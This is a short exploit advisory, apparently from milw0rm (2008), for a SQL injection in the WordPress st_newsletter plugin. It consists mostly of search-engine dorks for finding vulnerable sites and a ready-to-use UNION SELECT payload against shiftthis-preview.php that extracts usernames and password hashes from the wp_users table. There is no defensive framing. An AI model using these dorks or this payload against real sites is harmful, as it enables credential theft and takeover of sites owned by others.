29 lines
No EOL
1.1 KiB
Text
29 lines
No EOL
1.1 KiB
Text
#########################################################################
|
|
#
|
|
# Wordpress Plugin (st_newsletter) SQL Injection
|
|
#
|
|
#########################################################################
|
|
#
|
|
# AUTHOR : S@BUN
|
|
#
|
|
# HOME : http://www.hackturkiye.com/
|
|
#
|
|
#########################################################################
|
|
#
|
|
# DORKS 1 : allinurl :"wp-content/plugins/st_newsletter"
|
|
#
|
|
# DORK 2 : allinurl :"shiftthis-preview.php"
|
|
#
|
|
##########################################################################
|
|
EXPLOIT :
|
|
|
|
wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
|
|
|
|
|
|
##########################################################################
|
|
# S@BUN www.hackturkiye.com S@BUN
|
|
##########################################################################
|
|
# S@BUN GOOD LUCKY S@BUN
|
|
##########################################################################
|
|
|
|
# milw0rm.com [2008-02-03] |